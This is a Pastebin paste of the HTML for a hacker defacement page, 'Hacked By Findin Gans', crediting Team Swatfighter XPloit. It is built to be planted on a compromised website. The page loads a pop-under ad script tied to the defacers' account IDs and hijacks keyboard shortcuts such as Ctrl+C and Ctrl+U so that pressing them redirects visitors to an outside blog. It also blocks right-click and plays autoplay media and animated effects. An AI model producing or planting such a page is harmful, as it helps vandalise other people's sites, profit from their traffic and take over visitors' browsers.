Advertisement
Guest User

Untitled

a guest
Feb 14th, 2021
437
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.66 KB | None | 0 0
  1.  
  2. <html>
  3. <head>
  4. <meta property="og:description" content="Swatfighter XPloit "/>
  5. <meta property="og:image" content="https://f.top4top.io/p_1825v0sij0.jpeg"/>
  6. <link rel="shortcut icon" href="https://b.top4top.io/p_1861iuida0.png"/>
  7. <meta http-equiv="cache-control" content="index,cache">
  8. <meta http-equiv="pragma" content="public">
  9. <link rel="stylesheet" type="text/css" href="https://ia601501.us.archive.org/22/items/animated_201809/animated.css">
  10. <title>.[!] Hacked By Findin Gans[!]</title>
  11. </head>
  12. <body>
  13. <strong>
  14. <script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"></script>
  15. <center><br><p></p><blink><font face="monaco" size="15" font style="text-shadow: 0px 0px 30px red;" color="white">Call Me F1ndin</font><font face="Orbitron" size="7" color="white" class="a"></font><br></blink><br></center>
  16. <center><audio src="https://b.top4top.io/m_1824uf5me0.mp3" type="audio/mpeg" controls autoplays></center>
  17. <center><img style="width:350px;" src="https://b.top4top.io/p_1861iuida0.png" />
  18. <script src='http://misbahudin-dcaesga.googlecode.com/files/efek-salju.js'/><script>
  19. setInterval(function(){
  20. $(".berkedip").toggle();
  21. },300);
  22. </script>
  23.  
  24. <script type="text/javascript">
  25. var uid = '154035';
  26. var wid = '328457';
  27. </script>
  28. <script type="text/javascript" src="//cdn.popcash.net/pop.js"></script>
  29.  
  30. <style>
  31. body{
  32. text-align: center;
  33. font-size: 12px;
  34. font-family: verdana;
  35. background-image:url(https://i.gifer.com/fzUl.gif);
  36. background-size:cover;
  37. background-attachment: fixed;
  38. }
  39.  
  40. </style>
  41. <script>
  42.  
  43. TypingText = function(element, interval, cursor, finishedCallback) {
  44.  
  45. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  46.  
  47. this.running = true; // Never run.
  48.  
  49. return;
  50.  
  51. }
  52.  
  53. this.element = element;
  54.  
  55. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  56.  
  57. this.interval = (typeof interval == "undefined" ? 100 : interval);
  58.  
  59. this.origText = this.element.innerHTML;
  60.  
  61. this.unparsedOrigText = this.origText;
  62.  
  63. this.cursor = (cursor ? cursor : "");
  64.  
  65. this.currentText = "";
  66.  
  67. this.currentChar = 0;
  68.  
  69. this.element.typingText = this;
  70.  
  71. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  72.  
  73. TypingText.all.push(this);
  74.  
  75. this.running = false;
  76.  
  77. this.inTag = false;
  78.  
  79. this.tagBuffer = "";
  80.  
  81. this.inHTMLEntity = false;
  82.  
  83. this.HTMLEntityBuffer = "";
  84.  
  85. }
  86.  
  87. TypingText.all = new Array();
  88.  
  89. TypingText.currentIndex = 0;
  90.  
  91. TypingText.runAll = function() {
  92.  
  93. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  94.  
  95. }
  96.  
  97. TypingText.prototype.run = function() {
  98.  
  99. if(this.running) return;
  100.  
  101. if(typeof this.origText == "undefined") {
  102.  
  103. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
  104.  
  105. return;
  106.  
  107. }
  108.  
  109. if(this.currentText == "") this.element.innerHTML = "";
  110.  
  111. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  112.  
  113. if(this.currentChar < this.origText.length) {
  114.  
  115. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  116.  
  117. this.tagBuffer = "<";
  118.  
  119. this.inTag = true;
  120.  
  121. this.currentChar++;
  122.  
  123. this.run();
  124.  
  125. return;
  126.  
  127. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  128.  
  129. this.tagBuffer += ">";
  130.  
  131. this.inTag = false;
  132.  
  133. this.currentText += this.tagBuffer;
  134.  
  135. this.currentChar++;
  136.  
  137. this.run();
  138.  
  139. return;
  140.  
  141. } else if(this.inTag) {
  142.  
  143. this.tagBuffer += this.origText.charAt(this.currentChar);
  144.  
  145. this.currentChar++;
  146.  
  147. this.run();
  148.  
  149. return;
  150.  
  151. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  152.  
  153. this.HTMLEntityBuffer = "&";
  154.  
  155. this.inHTMLEntity = true;
  156.  
  157. this.currentChar++;
  158.  
  159. this.run();
  160.  
  161. return;
  162.  
  163. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  164.  
  165. this.HTMLEntityBuffer += ";";
  166.  
  167. this.inHTMLEntity = false;
  168.  
  169. this.currentText += this.HTMLEntityBuffer;
  170.  
  171. this.currentChar++;
  172.  
  173. this.run();
  174.  
  175. return;
  176.  
  177. } else if(this.inHTMLEntity) {
  178.  
  179. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  180.  
  181. this.currentChar++;
  182.  
  183. this.run();
  184.  
  185. return;
  186.  
  187. } else {
  188.  
  189. this.currentText += this.origText.charAt(this.currentChar);
  190.  
  191. }
  192.  
  193. this.element.innerHTML = this.currentText;
  194.  
  195. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  196.  
  197. this.currentChar++;
  198.  
  199. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  200.  
  201. } else {
  202.  
  203. this.currentText = "";
  204.  
  205. this.currentChar = 0;
  206.  
  207. this.running = false;
  208.  
  209. this.finishedCallback();
  210.  
  211. }
  212.  
  213. }
  214.  
  215. </script>
  216. <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
  217.  
  218. <center><p id="info"><font face="monaco" size="5" font style="text-shadow: 0px 0px 30px red;" color="white">Message :<br></font>
  219.  
  220. <font face="courier new" size="2" font style="text-shadow: 0px 0px 30px red;" color="white">Tak Masalah Seberapa Besar Kau Membenciku<br></font>
  221. <font face="courier new" size="2" font style="text-shadow: 0px 0px 30px red;" color="white">Karna Aku Tak Peduli Semua Tentang Mu !<br>
  222. <center><p id="info"><font face="monaco" size="5" font style="text-shadow: 0px 0px 30px red;" color="yellow">Cuman Nitip File Doang :<br></font>
  223. </font><a href="https://swatfighter-xploit.blogspot.com/?m=1"><font face="courier new" size="5" font style="text-shadow: 0px 0px 30px red;" color="white">Hacked By F1ndin<br></a></font>
  224. <br><font face="monaco" size="5" font style="text-shadow: 0px 0px 30px red;" color="yellow">Thanks To :<br></font>
  225. <font face="courier new" size="5" font style="text-shadow: 0px 0px 30px red;" color="white">~ Team Swatfighter XPloit - Ferdark - LeNoly - Fakhri Gans - Lator - Oskar - Dewa - Ucok~<br></font>
  226.  
  227. <script type="text/javascript">
  228.  
  229. //Define first typing example:
  230.  
  231. //Define second typing example (use "slashing" cursor at the end):
  232.  
  233. new TypingText(document.getElementById("info"), 150, function(i){
  234.  
  235. var ar = new Array("_"," ","_","_"); return " " + ar[i.length %
  236.  
  237. ar.length]; });
  238.  
  239. //Type out examples:
  240.  
  241. TypingText.runAll();
  242.  
  243. </script></br>
  244.  
  245. </script>
  246. <script language=JavaScript>
  247. <!--
  248.  
  249. var message="Please Don't!";
  250.  
  251. <script type="text/javascript"> //<![CDATA[
  252. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},
  253. shortcut.add("esc",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  254. shortcut.add("Ctrl+Shift+Del",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  255. shortcut.add("Ctrl+F",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  256. shortcut.add("Ctrl+W",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  257. shortcut.add("Ctrl+U",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  258. shortcut.add("Ctrl+A",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  259. shortcut.add("Ctrl+S",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  260. shortcut.add("Ctrl+X",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  261. shortcut.add("Ctrl+C",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  262. shortcut.add("Ctrl+V",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  263. shortcut.add("Ctrl+Y",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  264. shortcut.add("Ctrl+Z",function(){top.location.href="http://ryangueltoem.blogspot.co.id"});
  265. //]]></script>
  266.  
  267. ///////////////////////////////////
  268. function clickIE4(){
  269. if (event.button==2){
  270. alert(message);
  271. return false;
  272. }
  273. }
  274.  
  275. function clickNS4(e){
  276. if (document.layers||document.getElementById&&!document.all){
  277. if (e.which==2||e.which==3){
  278. alert(message);
  279. return false;
  280. }
  281. }
  282. }
  283.  
  284. if (document.layers){
  285. document.captureEvents(Event.MOUSEDOWN);
  286. document.onmousedown=clickNS4;
  287. }
  288. else if (document.all&&!document.getElementById){
  289. document.onmousedown=clickIE4;
  290. }
  291.  
  292. document.oncontextmenu=new Function("alert(message);return false")
  293.  
  294. // -->
  295. </script>
  296. <script type='text/javascript'>
  297. //<![CDATA[
  298. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="http://ryangueltoem.blogspot.com/"});
  299. //]]>
  300. </script>
  301. <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #FFFFFF; border-bottom: 1px solid #FFFFFF"><font face="courier new" size="3" font style="text-shadow: 0px 0px 5px white;" color="white"><font color="yellow">Greatz :</b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b>Thanks You Team Swatfighter XPloit </b></marquee></font></footer>
  302. </body>
  303. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement